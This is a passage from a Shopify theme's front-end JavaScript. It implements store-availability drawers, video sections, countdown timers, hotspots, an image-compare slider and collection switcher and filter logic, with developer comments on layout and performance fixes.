            if (self.container.querySelector(selectors.drawerOpenBtn)) {
              self.drawer = new theme.Drawers('StoreAvailabilityDrawer', 'availability');
            }

            // Setup modal if have open button
            if (self.container.querySelector(selectors.modalOpenBtn)) {
              self.modal = new theme.Modals('StoreAvailabilityModal', 'availability');
            }

            var title = self.container.querySelector(selectors.productTitle);
            if (title) {
              title.textContent = self.productTitle;
            }

            // Globo may have already set its message before this variant's
            // pickup rows existed (e.g. it never re-fires the event because
            // the product was already in preorder state pre-variant-change).
            self.applyPreorderLeadTime();

            self.relocateDrawerOutOfModal();
          });
      },

      relocateDrawerOutOfModal: function() {
        // In a quick view, this component's markup renders inside .modal__inner,
        // which sets transform-style: preserve-3d — that creates a new CSS
        // containing block, trapping any position:fixed descendant (the drawer)
        // inside the modal's small box instead of the real viewport. Move it to
        // <body> so it slides in from the actual page edge like every other
        // drawer on the site.
        var drawerEl = this.container.querySelector('#StoreAvailabilityDrawer');
        if (!drawerEl || !drawerEl.closest('.modal')) return;

        document.body.appendChild(drawerEl);
        this.relocatedDrawer = drawerEl;
      },

      applyPreorderLeadTime: function(event) {
        var leadTimeRows = this.container.querySelectorAll(selectors.preorderLeadTime);
        if (!leadTimeRows.length) return;

        var message =
          event && event.detail && event.detail.profile
            ? event.detail.profile.message.messageBellowText
            : null;

        if (!message) {
          var messageEl = document.querySelector(selectors.preorderMessage);
          message = messageEl ? messageEl.textContent.trim() : '';
        }

        if (!message) return;

        leadTimeRows.forEach(function(row) {
          var textEl = row.querySelector(selectors.preorderLeadTimeText);
          if (textEl) {
            // Globo's own message reads "Ready to Ship in X days", which doesn't make
            // sense for a pickup row; swap in the pickup-appropriate label but keep
            // the lead time Globo calculated (e.g. "in 7-10 Days").
            var pickupLabel = row.dataset.nfPreorderPickupLabel;
            textEl.textContent = pickupLabel ? message.replace(/ready to ship/i, pickupLabel) : message;
          }
          row.hidden = false;
        });
      }
    });

    return StoreAvailability;
  })();
  
  theme.VideoSection = (function() {
    var selectors = {
      videoParent: '.video-parent-section'
    };
  
    function videoSection(container) {
      this.container = container;
      this.sectionId = container.getAttribute('data-section-id');
      this.namespace = '.video-' + this.sectionId;
      this.videoObject;
  
      theme.initWhenVisible({
        element: this.container,
        callback: this.init.bind(this),
        threshold: 500
      });
    }
  
    videoSection.prototype = Object.assign({}, videoSection.prototype, {
      init: function() {
        var dataDiv = this.container.querySelector('.video-div');
        if (!dataDiv) {
          return;
        }
        var type = dataDiv.dataset.type;
  
        switch(type) {
          case 'youtube':
            var videoId = dataDiv.dataset.videoId;
            this.initYoutubeVideo(videoId);
            break;
          case 'vimeo':
            var videoId = dataDiv.dataset.videoId;
            this.initVimeoVideo(videoId);
            break;
          case 'mp4':
            this.initMp4Video();
            break;
        }
      },
  
      initYoutubeVideo: function(videoId) {
        this.videoObject = new theme.YouTube(
          'YouTubeVideo-' + this.sectionId,
          {
            videoId: videoId,
            videoParent: selectors.videoParent
          }
        );
      },
  
      initVimeoVideo: function(videoId) {
        this.videoObject = new theme.VimeoPlayer(
          'Vimeo-' + this.sectionId,
          videoId,
          {
            videoParent: selectors.videoParent
          }
        );
      },
  
      initMp4Video: function() {
        var mp4Video = 'Mp4Video-' + this.sectionId;
        var mp4Div = document.getElementById(mp4Video);
        var parent = mp4Div.closest(selectors.videoParent);
  
        if (mp4Div) {
          parent.classList.add('loaded');
  
          var playPromise = document.querySelector('#' + mp4Video).play();
  
          // Edge does not return a promise (video still plays)
          if (playPromise !== undefined) {
            playPromise.then(function() {
                // playback normal
              }).catch(function() {
                mp4Div.setAttribute('controls', '');
                parent.classList.add('video-interactable');
              });
          }
        }
      },
  
      onUnload: function(evt) {
        var sectionId = evt.target.id.replace('shopify-section-', '');
        if (this.videoObject && typeof this.videoObject.destroy === 'function') {
          this.videoObject.destroy();
        }
      }
    });
  
    return videoSection;
  })();
  
  /*============================================================================
    CountdownTimer
  ==============================================================================*/
  
  class CountdownTimer extends HTMLElement {
    constructor() {
      super();
      this.el = this;
      this.display = this.querySelector('[data-time-display]');
      this.block = this.closest('.countdown__block--timer');
      this.year = this.el.dataset.year;
      this.month = this.el.dataset.month;
      this.day = this.el.dataset.day;
      this.hour = this.el.dataset.hour;
      this.minute = this.el.dataset.minute;
      this.daysPlaceholder = this.querySelector('[date-days-placeholder]');
      this.hoursPlaceholder = this.querySelector('[date-hours-placeholder]');
      this.minutesPlaceholder = this.querySelector('[date-minutes-placeholder]');
      this.secondsPlaceholder = this.querySelector('[date-seconds-placeholder]');
      this.messagePlaceholder = this.querySelector('[data-message-placeholder]');
      this.hideTimerOnComplete = this.el.dataset.hideTimer;
      this.completeMessage = this.el.dataset.completeMessage;
  
      this.timerComplete = false;
  
      this.init();
    }
  
    init() {
      setInterval(() => {
        if (!this.timerComplete) {
          this._calculate();
        }
      }, 1000);
  
    }
  
    _calculate() {
      // Find time difference and convert to integer
      const timeDifference = +new Date(`${this.month}/${this.day}/${this.year} ${this.hour}:${this.minute}:00`).getTime() - +new Date().getTime();
      // If time difference is greater than 0, calculate remaining time
      if (timeDifference > 0) {
        const intervals = {
          days: Math.floor(timeDifference / (1000 * 60 * 60 * 24)),
          hours: Math.floor((timeDifference / (1000 * 60 * 60)) % 24),
          minutes: Math.floor((timeDifference / 1000 / 60) % 60),
          seconds: Math.floor((timeDifference / 1000) % 60),
        };
  
        this.daysPlaceholder.innerHTML = intervals.days;
        this.hoursPlaceholder.innerHTML = intervals.hours;
        this.minutesPlaceholder.innerHTML = intervals.minutes;
        this.secondsPlaceholder.innerHTML = intervals.seconds;
      } else {
        if (this.completeMessage && this.messagePlaceholder) {
          this.messagePlaceholder.classList.add('countdown__timer-message--visible');
        }
  
        if (this.hideTimerOnComplete === 'true') {
          this.display.classList.remove('countdown__display--visible');
          this.display.classList.add('countdown__display--hidden');
        }
  
        if (!this.completeMessage && this.hideTimerOnComplete === 'true') {
          this.block.classList.add('countdown__block--hidden');
        }
  
        this.timerComplete = true;
      }
    }
  }
  
  customElements.define('countdown-timer', CountdownTimer);
  
  /*============================================================================
    HotSpots
  ==============================================================================*/
  
  class HotSpots extends HTMLElement {
    constructor() {
      super();
      this.el = this;
      this.buttons = this.querySelectorAll('[data-button]');
      this.hotspotBlocks = this.querySelectorAll('[data-hotspot-block]');
      this.blockContainer = this.querySelector('[data-block-container]');
      this.colorImages = this.querySelectorAll('.grid-product__color-image');
      this.colorSwatches = this.querySelectorAll('.color-swatch--with-image');
  
      this._bindEvents();
      this._setupQuickShop();
  
      if (this.colorImages.length) {
        this._colorSwatchHovering();
      }
    }
  
    _colorSwatchHovering() {
      this.colorSwatches.forEach(swatch => {
        swatch.addEventListener('mouseenter', function() {
          this._setActiveColorImage(swatch);
        }.bind(this));
  
        swatch.addEventListener('touchstart', function(evt) {
          evt.preventDefault();
          this._setActiveColorImage(swatch);
        }.bind(this), {passive: true});
  
        swatch.addEventListener('mouseleave', function() {
          this._removeActiveColorImage(swatch);
        }.bind(this));
      });
    }
  
    _setActiveColorImage(swatch) {
      var id = swatch.dataset.variantId;
      var image = swatch.dataset.variantImage;
  
      // Unset all active swatch images
      this.colorImages.forEach(el => {
        el.classList.remove('is-active');
      });
  
      // Unset all active swatches
      this.colorSwatches.forEach(el => {
        el.classList.remove('is-active');
      });
  
      // Set active image and swatch
      var imageEl = this.el.querySelector('.grid-product__color-image--' + id);
      imageEl.style.backgroundImage = 'url(' + image + ')';
      imageEl.classList.add('is-active');
      swatch.classList.add('is-active');
  
      // Update product grid item href with variant URL
      var variantUrl = swatch.dataset.url;
      var gridItem = swatch.closest('.grid-item__link');
  
      if (gridItem) gridItem.setAttribute('href', variantUrl);
    }
  
    _removeActiveColorImage(swatch) {
      const id = swatch.dataset.variantId;
      this.querySelector(`.grid-product__color-image--${id}`).classList.remove('is-active');
    }
  
    /* Setup event listeners */
    _bindEvents() {
      this.buttons.forEach(button => {
        const id = button.dataset.button;
  
        button.on('click', e => {
          e.preventDefault();
          e.stopPropagation();
          this._showContent(id);
        });
      });
  
      // Display active hotspot block on theme editor select
      document.addEventListener('shopify:block:select', (e) => {
        const blockId = e.detail.blockId;
        this._showContent(`${blockId}`);
      });
    }
  
    /* Toggle sidebar content */
    _showContent(id) {
      // Hide all hotspotBlock
      // Show the hotspotBlock with the id
      this.hotspotBlocks.forEach((block) => {
        if (block.dataset.hotspotBlock === id) {
          block.classList.add('is-active');
        } else {
          block.classList.remove('is-active');
        }
      });
    }
  
    _setupQuickShop() {
      if (this.querySelectorAll('[data-block-type="product"]').length > 0) {
        // Ensure we are utilizing the right version of QuickShop based off of theme
        if (typeof theme.QuickShop === 'function') {
          new theme.QuickShop(this.blockContainer);
        } else if (typeof theme.initQuickShop === 'function') {
          theme.initQuickShop();
        }
  
        if (typeof theme.QuickAdd === 'function') {
          new theme.QuickAdd(this.blockContainer);
        }
      }
    }
  }
  
  customElements.define('hot-spots', HotSpots);
  
  /*============================================================================
    ImageCompare
  ==============================================================================*/
  
  class ImageCompare extends HTMLElement {
    constructor() {
      super();
      this.el = this;
      this.sectionId = this.dataset.sectionId;
      this.button = this.querySelector('[data-button]');
      this.draggableContainer = this.querySelector('[data-draggable]');
      this.primaryImage = this.querySelector('[data-primary-image]');
      this.secondaryImage = this.querySelector('[data-secondary-image]');
  
      this.calculateSizes();
  
      this.active = false;
      this.currentX = 0;
      this.initialX = 0;
      this.xOffset = 0;
  
      this.buttonOffset = this.button.offsetWidth / 2;
  
      this.el.addEventListener("touchstart", this.dragStart, false);
      this.el.addEventListener("touchend", this.dragEnd, false);
      this.el.addEventListener("touchmove", this.drag, false);
  
      this.el.addEventListener("mousedown", this.dragStart, false);
      this.el.addEventListener("mouseup", this.dragEnd, false);
      this.el.addEventListener("mousemove", this.drag, false);
  
      window.on('resize', theme.utils.debounce(250, () => { this.calculateSizes(true)}));
  
      document.addEventListener('shopify:section:load', event => {
        if (event.detail.sectionId === this.sectionId && this.primaryImage !== null) {
          this.calculateSizes();
        }
      });
    }
  
    calculateSizes(hasResized = false) {
      this.active = false;
      this.currentX = 0;
      this.initialX = 0;
      this.xOffset = 0;
  
      this.buttonOffset = this.button.offsetWidth / 2;
  
      this.elWidth = this.el.offsetWidth;
  
      this.button.style.transform = `translate(-${this.buttonOffset}px, -50%)`;
  
      if (this.primaryImage) {
        this.primaryImage.style.width = `${this.elWidth}px`;
      }
  
      if (hasResized) this.draggableContainer.style.width = `${this.elWidth/2}px`;
    }
  
    dragStart(e) {
      if (e.type === "touchstart") {
        this.initialX = e.touches[0].clientX - this.xOffset;
      } else {
        this.initialX = e.clientX - this.xOffset;
      }
  
      if (e.target === this.button) {
        this.active = true;
      }
    }
  
    dragEnd(e) {
      this.initialX = this.currentX;
  
      this.active = false;
    }
  
    drag(e) {
      if (this.active) {
  
        e.preventDefault();
  
        if (e.type === "touchmove") {
          this.currentX = e.touches[0].clientX - this.initialX;
        } else {
          this.currentX = e.clientX - this.initialX;
        }
  
        this.xOffset = this.currentX;
        this.setTranslate(this.currentX, this.button);
      }
    }
  
    setTranslate(xPos, el) {
      let newXpos = xPos - this.buttonOffset;
      let newVal = (this.elWidth/2) + xPos;
  
      const boundaryPadding = 50;
      const XposMin = (this.elWidth/2 + this.buttonOffset) * -1;
      const XposMax = this.elWidth/2 - this.buttonOffset;
  
      // Set boundaries for dragging
      if (newXpos < (XposMin + boundaryPadding)) {
        newXpos = XposMin + boundaryPadding;
        newVal = boundaryPadding
      } else if (newXpos > (XposMax - boundaryPadding)) {
        newXpos = XposMax - boundaryPadding;
        newVal = this.elWidth - boundaryPadding;
      }
  
      el.style.transform = `translate(${newXpos}px, -50%)`;
      this.draggableContainer.style.width = `${newVal}px`;
    }
  }
  
  customElements.define('image-compare', ImageCompare);
  

  theme.Blog = (function() {
  
    function Blog(container) {
      this.tagFilters();
    }
  
    Blog.prototype = Object.assign({}, Blog.prototype, {
      tagFilters: function() {
        var filterBy = document.getElementById('BlogTagFilter');
  
        if (!filterBy) {
          return;
        }
  
        filterBy.addEventListener('change', function() {
          location.href = filterBy.value;
        });
      }
    });
  
    return Blog;
  })();
  
  theme.CollectionSwitcher = (function() {
    var selectors = {
      trigger: '.collection-switcher__trigger',
      collection: '.collection-switcher__collection',
      slider: '.collection-switcher__collection-grid'
    };
  
    var sliderArgs = {
      adaptiveHeight: false,
      avoidReflow: true,
      autoPlay: false,
      cellAlign: 'left',
      contain: true,
      fade: false,
      prevNextButtons: true,
      setGallerySize: true,
      wrapAround: false
    };
  
    function CollectionSwitcher(container) {
      this.container = container;
      this.sectionId = this.container.getAttribute('data-section-id');
      this.slideshows = container.querySelectorAll(selectors.slider);
      this.namespace = '.switcher-' + this.sectionId;
      this.flickity = {};
      this.activeIndex = 0;
      // Tallest measured viewport height across tabs — never shrink on switch (prevents CLS/jerk)
      this.lockedViewportHeight = 0;

      this.init();
    }
  
    CollectionSwitcher.prototype = Object.assign({}, CollectionSwitcher.prototype, {
      init: function() {
        var self = this;
        this.container.querySelectorAll(selectors.trigger).forEach(trigger => {
          trigger.on('click', this.switch.bind(this));
          // Prefetch first images on hover/focus so switch feels instant
          trigger.addEventListener('mouseenter', function() {
            self.prefetchTriggerPanel(trigger);
          });
          trigger.addEventListener('focus', function() {
            self.prefetchTriggerPanel(trigger);
          });
        });
  
        if (!this.slideshows.length) { return }
  
        this.config = {
          perRow: parseInt(this.container.getAttribute('data-per-row'), 10) || 5,
          perRowMobile: 2 // fixed always
        };
  
        this.initSliders();
  
        document.addEventListener('matchSmall', function() {
          this.lockedViewportHeight = 0;
          this.initSliders();
        }.bind(this));
  
        document.addEventListener('unmatchSmall', function() {
          this.lockedViewportHeight = 0;
          this.initSliders();
        }.bind(this));
      },

      prefetchTriggerPanel: function(trigger) {
        if (!trigger) return;
        var id = trigger.getAttribute('aria-controls');
        var panel = id && document.getElementById(id);
        if (!panel) return;
        var slider = panel.querySelector(selectors.slider);
        this.eagerLoadPanelImages(slider);
      },

      /**
       * Measure all panels and lock every Flickity viewport to the tallest height.
       * Prevents below-the-fold content from jumping when a shorter tab is shown.
       */
      lockTallestViewportHeight: function() {
        var self = this;
        var maxHeight = this.lockedViewportHeight || 0;

        this.slideshows.forEach(function(slideshow) {
          // Measure product cards only. Viewport offsetHeight includes CSS/JS
          // min-height floors (e.g. 450px) and would lock empty space in.
          let cells = slideshow.querySelectorAll('.flickity-slider > .grid__item');
          if (!cells.length) {
            cells = slideshow.querySelectorAll('.grid__item');
          }
          let contentHeight = 0;
          for (const cell of cells) {
            contentHeight = Math.max(contentHeight, cell.offsetHeight || 0);
          }

          if (contentHeight > maxHeight) {
            maxHeight = contentHeight;
          }
        });

        if (maxHeight < 100) return;

        this.lockedViewportHeight = maxHeight;
        this.container.style.setProperty('--collection-switcher-viewport-height', maxHeight + 'px');

        this.slideshows.forEach(function(slideshow) {
          var viewport = slideshow.querySelector('.flickity-viewport');
          if (!viewport) return;
          viewport.style.minHeight = maxHeight + 'px';
          // Keep Flickity's height from shrinking below the lock
          var current = parseFloat(viewport.style.height) || 0;
          if (!current || current < maxHeight) {
            viewport.style.height = maxHeight + 'px';
          }
        });
      },

      applyLockedHeight: function(slider) {
        if (!slider || !this.lockedViewportHeight) return;
        var viewport = slider.querySelector('.flickity-viewport');
        if (!viewport) return;

        var locked = this.lockedViewportHeight;
        viewport.style.minHeight = locked + 'px';

        let cells = slider.querySelectorAll('.flickity-slider > .grid__item');
        if (!cells.length) {
          cells = slider.querySelectorAll('.grid__item');
        }
        let contentHeight = 0;
        for (const cell of cells) {
          contentHeight = Math.max(contentHeight, cell.offsetHeight || 0);
        }

        var current = parseFloat(viewport.style.height) || 0;
        // If Flickity resized shorter (no swatches / smaller images), restore the lock
        if (!current || current < locked) {
          viewport.style.height = locked + 'px';
        } else if (contentHeight > locked) {
          // Content grew (lazy images) — raise the lock for all tabs
          this.lockedViewportHeight = contentHeight;
          this.container.style.setProperty('--collection-switcher-viewport-height', contentHeight + 'px');
          this.slideshows.forEach(function(slideshow) {
            var vp = slideshow.querySelector('.flickity-viewport');
            if (!vp) return;
            vp.style.minHeight = contentHeight + 'px';
            vp.style.height = contentHeight + 'px';
          });
        }
      },

      /**
       * Force-load the first N product images in a panel so they paint immediately
       * instead of waiting on loading="lazy" (esp. panels that were display:none).
       */
      eagerLoadPanelImages: function(root, limit) {
        if (!root) return;
        var isMobile = window.matchMedia('(max-width: 589px)').matches;
        var count = limit || (isMobile ? 2 : (this.config && this.config.perRow) || 5);
        var items = root.querySelectorAll('.grid__item');
        var max = Math.min(count, items.length);

        for (var i = 0; i < max; i++) {
          var imgs = items[i].querySelectorAll(
            '.grid-product__image-mask img, .image-wrap img, .grid__image-ratio img'
          );
          if (!imgs.length) {
            imgs = items[i].querySelectorAll('img.grid-product__image');
          }

          imgs.forEach(function(img) {
            if (img.dataset.switcherEager === '1') return;
            img.dataset.switcherEager = '1';
            img.setAttribute('loading', 'eager');
            img.setAttribute('fetchpriority', 'high');

            if (img.complete && img.naturalWidth > 0) return;

            // Re-assign src so the in-DOM img starts loading now that it's eager + visible.
            // (Previously also warmed a detached Image() with the same src/srcset first —
            // that was a second, redundant fetch of the same resource; the browser already
            // re-evaluates srcset when src changes, so this alone is enough to kick it off.)
            var srcAttr = img.getAttribute('src');
            if (srcAttr) {
              img.removeAttribute('src');
              img.setAttribute('src', srcAttr);
            }
          });
        }
      },
  
      initSliders: function() {
        var self = this;
        var isMobile = window.matchMedia('(max-width: 589px)').matches;

        this.container.querySelectorAll(selectors.collection).forEach(function(collection) {
          collection.classList.remove('hide');
        });

        this.slideshows.forEach(function(slideshow, i) {
          var perRow = parseInt(slideshow.getAttribute('data-per-row'), 10) || self.config.perRow || 5;
          var groupCells = isMobile ? self.config.perRowMobile : perRow;

          slideshow.style.removeProperty('display');
          slideshow.style.removeProperty('flex-wrap');
          slideshow.style.removeProperty('overflow');

          slideshow.querySelectorAll('.grid__item').forEach(function(item) {
            item.style.removeProperty('width');
            item.style.removeProperty('max-width');
            item.style.removeProperty('flex');
            item.style.setProperty('display', 'block', 'important');
            item.style.setProperty('opacity', '1', 'important');
            item.style.setProperty('visibility', 'visible', 'important');
          });

          if (self.flickity[i] && typeof self.flickity[i].destroy === 'function') {
            self.flickity[i].destroy();
          }

          var args = Object.assign({}, sliderArgs, { groupCells: groupCells });
          self.flickity[i] = new theme.Slideshow(slideshow, args);

          var flickityInstance = self.flickity[i];
          var clearLayoutStyles = function() {
            slideshow.querySelectorAll('.grid__item').forEach(function(item) {
              item.style.removeProperty('width');
              item.style.removeProperty('max-width');
              item.style.removeProperty('flex');
              item.style.removeProperty('display');
              item.style.removeProperty('opacity');
              item.style.removeProperty('visibility');
            });
            if (flickityInstance && typeof flickityInstance.resize === 'function') {
              flickityInstance.resize();
            }
            self.lockTallestViewportHeight();
          };

          if (flickityInstance && flickityInstance.slideshow && typeof flickityInstance.slideshow.on === 'function') {
            flickityInstance.slideshow.once('settle', clearLayoutStyles);
          }

          if (flickityInstance && typeof flickityInstance.resize === 'function') {
            flickityInstance.resize();
          }

          if (i !== self.activeIndex) {
            var collectionEl = slideshow.closest(selectors.collection);
            if (collectionEl) {
              collectionEl.classList.add('hide');
            }
          }
        });

        // Lock while all panels are still measurable, then again after paint
        this.lockTallestViewportHeight();
        requestAnimationFrame(function() {
          self.lockTallestViewportHeight();
        });

        if (AOS) {
          AOS.refresh();
        }
      },
  
      switch: function(evt) {
        evt.preventDefault();

        var containerId = evt.currentTarget.getAttribute('aria-controls');
        var newContainer = document.getElementById(containerId);
        this.activeIndex = parseInt(newContainer.dataset.index);
        var self = this;

        this.container.querySelectorAll(selectors.trigger).forEach(trigger => {
          trigger.classList.remove('is-active');
        });

        evt.currentTarget.classList.add('is-active');

        // Only the active-tab highlight runs inside the click. Swapping the panels is
        // the expensive part (laying out the newly shown product grid, ~100-130ms), so
        // it runs after the browser has painted the highlight. A newer click bumps the
        // token, so a superseded swap never applies.
        var token = this._switchToken = (this._switchToken || 0) + 1;

        requestAnimationFrame(function() {
          setTimeout(function() {
            if (token !== self._switchToken) return;

            self.showPanel(newContainer);
          }, 0);
        });
      },

      showPanel: function(newContainer) {
        var self = this;

        // Hide collections, show new one
        this.container.querySelectorAll(selectors.collection).forEach(collection => {
          collection.classList.add('hide');
        });

        newContainer.classList.remove('hide');

        var activeFlickity = this.flickity[this.activeIndex];
        var slider = newContainer.querySelector(selectors.slider);

        // Drop stale avoidReflow height locks for this slider
        if (slider && slider.id) {
          document.querySelectorAll('style[data-flickity-avoid-reflow="' + slider.id + '"]').forEach(function(styleEl) {
            styleEl.parentNode.removeChild(styleEl);
          });
        }

        // Kick first-row images immediately so they paint with the tab change
        this.eagerLoadPanelImages(slider);

        // Write-only height lock: set minHeight from the already-known lockedViewportHeight
        // without reading offsetHeight back (that would force a synchronous layout).
        // Measuring/adjusting happens in stabilize() below, after paint.
        if (slider && this.lockedViewportHeight) {
          var lockedViewport = slider.querySelector('.flickity-viewport');
          if (lockedViewport) {
            lockedViewport.style.minHeight = this.lockedViewportHeight + 'px';
          }
        }

        var stabilize = function() {
          if (activeFlickity && typeof activeFlickity.resize === 'function') {
            activeFlickity.resize();
          }
          // After Flickity measures this tab, re-apply lock (never shrink; raise if taller)
          self.applyLockedHeight(slider);
        };

        // rAF runs BEFORE paint, so calling stabilize() directly inside it still blocks
        // the paint on Flickity.resize()/offsetHeight. Nest a setTimeout(0) inside the
        // rAF so the browser paints the swap first, then runs the measure/resize work
        // as its own task.
        requestAnimationFrame(function() {
          setTimeout(function() {
            stabilize();
            requestAnimationFrame(stabilize);
          }, 0);
        });

        // No AOS.refresh() here: the switcher's own [data-aos] grid items already have
        // their animation neutralized by opacity:1 !important/visibility:visible !important
        // in __index-css.liquid, and content below is protected from shifting by the
        // lockedViewportHeight mechanism, so there's nothing left for a refresh to fix
        // here. Removed because it was a full-page [data-aos] rescan + layout on every
        // tab click. Re-add (deferred, not synchronous) if animations below the switcher
        // are ever found to desync after a tab switch.

        // One fallback pass for lazy images / Safari layout. The per-image `load`
        // listeners below already catch the general "content finished loading" case;
        // this was previously two fixed-delay passes (100ms + 350ms), each re-forcing
        // a Flickity.resize() + offsetHeight reflow — redundant with each other and
        // with the load listeners, so trimmed to one.
        setTimeout(stabilize, 100);

        if (slider) {
          var firstRowLimit = window.matchMedia('(max-width: 589px)').matches
            ? 2
            : (this.config && this.config.perRow) || 5;
          var firstItems = slider.querySelectorAll('.grid__item');
          for (var i = 0; i < Math.min(firstRowLimit, firstItems.length); i++) {
            firstItems[i].querySelectorAll(
              '.grid-product__image-mask img, .image-wrap img, .grid__image-ratio img'
            ).forEach(function(img) {
              if (!img.complete) {
                img.addEventListener('load', stabilize, { once: true });
              }
            });
          }
        }
      },

      destroy: function() {
        if (this.flickity && typeof this.flickity.destroy === 'function') {
          this.flickity.destroy();
        }
      },
  
      onUnload: function() {
        this.destroy();
      }
  
    });
  
    return CollectionSwitcher;
  })();
  
  theme.CollectionSidebar = (function() {
    var selectors = {
      sidebar: '#CollectionSidebar',
      filterDrawer: '#FilterDrawer',
    };

    function CollectionSidebar(container) {
      this.container = container.querySelector(selectors.sidebar);
    }

    CollectionSidebar.prototype = Object.assign({}, CollectionSidebar.prototype, {
      init: function() {
        var filterDrawerEl = document.querySelector(selectors.filterDrawer);
        if (!filterDrawerEl) {
          return;
        }

        function setupFilterDrawer() {
          if (theme.FilterDrawer && typeof theme.FilterDrawer.destroy === 'function') {
            theme.FilterDrawer.destroy();
          }
          theme.FilterDrawer = null;
          theme.FilterDrawer = new theme.Drawers('FilterDrawer', 'collection-filters', true);
        }

        var fd = theme.FilterDrawer;
        var deferWhileClosing =
          window.innerWidth < 768 &&
          fd &&
          (fd._closeAnimPending ||
            (fd.drawer && fd.drawer.classList.contains(fd.config.activeDrawer)));

        if (deferWhileClosing) {
          var ran = false;
          function runOnce() {
            if (ran) {
              return;
            }
            ran = true;
            document.removeEventListener('drawerClose', onDrawerClose);
            window.clearTimeout(fallbackTimer);
            setupFilterDrawer();
          }
          function onDrawerClose(ev) {
            if (ev.detail && ev.detail.id === 'FilterDrawer') {
              runOnce();
            }
          }
          document.addEventListener('drawerClose', onDrawerClose);
          var fallbackTimer = window.setTimeout(runOnce, 700);
        } else {
          setupFilterDrawer();
        }
      },
  
      forceReload: function() {
        this.init();
      },
  
      onSelect: function() {
        if (theme.FilterDrawer && (drawerStyle || theme.config.bpSmall)) {
          theme.FilterDrawer.open();
        }
      },
  
      onDeselect: function() {
        if (theme.FilterDrawer) {
          theme.FilterDrawer.close();
        }
      },
  
      onUnload: function() {
        if (theme.FilterDrawer) {
          try {
            theme.FilterDrawer.close();
          } catch (e) {}
          if (typeof theme.FilterDrawer.destroy === 'function') {
            theme.FilterDrawer.destroy();
          }
          theme.FilterDrawer = null;
        }
      }
    });

    return CollectionSidebar;
  })();

  theme.Collection = (function() {
  var isAnimating = false;
  var hasLoadedBefore = false;

  var selectors = {
    sortSelect: '#SortBy',
    hero: '.collection-hero',
    title: '.collection-title',
    sidebar: '#CollectionSidebar',
    activeTagList: '.tag-list--active-tags',
    tags: '.tag-list input',
    activeTags: '.tag-list a',
    tagsForm: '.filter-form',
    filters: '.collection-filter',
    filterSidebar: '.collapsible-content--sidebar',
    filterDetails: 'details.collection-sidebar__details',
    trigger: '.collapsible-trigger',
    priceRange: '.price-range',
    priceRangeInputMin: '.price-range__input-min',
    priceRangeInputMax: '.price-range__input-max',
  };

  var classes = {
    activeTag: 'tag--active',
    removeTagParent: 'tag--remove',
    filterSidebar: 'collapsible-content--sidebar',
    isOpen: 'is-open',
  };

  function Collection(container) {
    this.container = container;
    this.sectionId = container.getAttribute('data-section-id');
    this.namespace = '.collection-' + this.sectionId;

    var heroImageContainer = container.querySelector('.collection-hero');

    if (heroImageContainer) {
      if (hasLoadedBefore) {
        this.checkIfNeedReload();
      }

      heroImageContainer.classList.remove('loading', 'loading--delayed');
      heroImageContainer.classList.add('loaded');
    } else if (theme.settings.overlayHeader) {
      theme.headerNav.disableOverlayHeader();
    }

    this.sidebar = new theme.CollectionSidebar(container);

    this.ajaxRenderer = new theme.AjaxRenderer({
      sections: [
        {
          sectionId: this.sectionId,
          nodeId: ['SearchResultsHeader', 'CollectionAjaxContent', 'FilterDrawerTrigger'],
        },
      ],
      onReplace: this.onReplaceAjaxContent.bind(this),
    });

    this.init();
  }

  Collection.prototype = Object.assign({}, Collection.prototype, {
    init: function() {
      const currentPath = window.location.pathname;
      const previousPath = localStorage.getItem('previousCollectionPath');

      if (previousPath && previousPath !== currentPath) {
        localStorage.removeItem('checkedCheckboxes');
      }
      localStorage.setItem('previousCollectionPath', currentPath);

      try {
        sessionStorage.removeItem(this.getFilterStorageKey());
      } catch (e) {}

      this.bindBackButton();
      this.sidebar.init();
      this.sortSelect = this.container.querySelector(selectors.sortSelect);

      if (this.sortSelect) {
        this.defaultSort = this.getDefaultSortValue();
        this.sortSelect.addEventListener('change', this.onSortChange.bind(this));
      }

      this.initPriceRange();

      document.querySelectorAll(selectors.activeTags).forEach(tag => {
        tag.addEventListener('click', this.onTagClick.bind(this));
        tag.addEventListener('click', this.handleCheckboxChange.bind(this));
        
      });

      if (!this._onFilterFormChangeBound) {
        this._onFilterFormChangeBound = this.onFilterFormChange.bind(this);
      }
      document.querySelectorAll(selectors.tagsForm).forEach(form => {
        form.addEventListener('change', this._onFilterFormChangeBound);
      });

      if (this._filterDrawerDrawerCloseBound) {
        document.removeEventListener('drawerClose', this._filterDrawerDrawerCloseBound);
      }
      this._filterDrawerDrawerCloseBound = function(evt) {
        if (!evt.detail || evt.detail.id !== 'FilterDrawer') {
          return;
        }
        if (window.innerWidth < 768) {
          this.savePersistedOpenFilters();
        }
        var fd = document.querySelector('#FilterDrawer');
        if (fd) {
          fd.classList.remove('open');
        }
      }.bind(this);
      document.addEventListener('drawerClose', this._filterDrawerDrawerCloseBound);

      if (this._filterDrawerDrawerOpenBound) {
        document.removeEventListener('drawerOpen.FilterDrawer', this._filterDrawerDrawerOpenBound);
      }
      this._filterDrawerDrawerOpenBound = function() {
        if (window.innerWidth < 768) {
          var self = this;
          requestAnimationFrame(function() {
            requestAnimationFrame(function() {
              self.restorePersistedOpenFilters();
            });
          });
        }
      }.bind(this);
      document.addEventListener('drawerOpen.FilterDrawer', this._filterDrawerDrawerOpenBound);

      window.addEventListener('beforeunload', function() {
        try {
          sessionStorage.removeItem(this.getFilterStorageKey());
        } catch (e) {}
      }.bind(this));

      window.addEventListener('pageshow', function(evt) {
        if (evt.persisted) {
          this.collapseAllFilterDrawerSections();
          try {
            sessionStorage.removeItem(this.getFilterStorageKey());
          } catch (e) {}
        }
      }.bind(this));

      this.container.addEventListener('click', this.onShowMoreClick.bind(this));

      setTimeout(()=>{
        this.loadCheckedCheckboxes();
      },1000)

      this.initCollectionMenuTabs();

      hasLoadedBefore = true;
    },

    /*
     * Liquid renders --layout-center for any tab strip (non-carousel). JS only enables
     * Flickity when labels overflow the row; Flickity then replaces that flex layout.
     */
    initCollectionMenuTabs: function() {
      var self = this;
      if (this.collectionMenuTabsStaticResizeHandler) {
        window.removeEventListener('resize', this.collectionMenuTabsStaticResizeHandler);
        this.collectionMenuTabsStaticResizeHandler = null;
      }
      if (this.collectionMenuTabsResizeObserver) {
        this.collectionMenuTabsResizeObserver.disconnect();
        this.collectionMenuTabsResizeObserver = null;
      }
      if (this.collectionMenuTabsFlickity && typeof this.collectionMenuTabsFlickity.destroy === 'function') {
        this.collectionMenuTabsFlickity.destroy();
      }
      this.collectionMenuTabsFlickity = null;

      var sliders = this.container.querySelectorAll('.collection-menu-tabs__slider');
      var slider = null;
      for (var si = 0; si < sliders.length; si++) {
        var candidate = sliders[si];
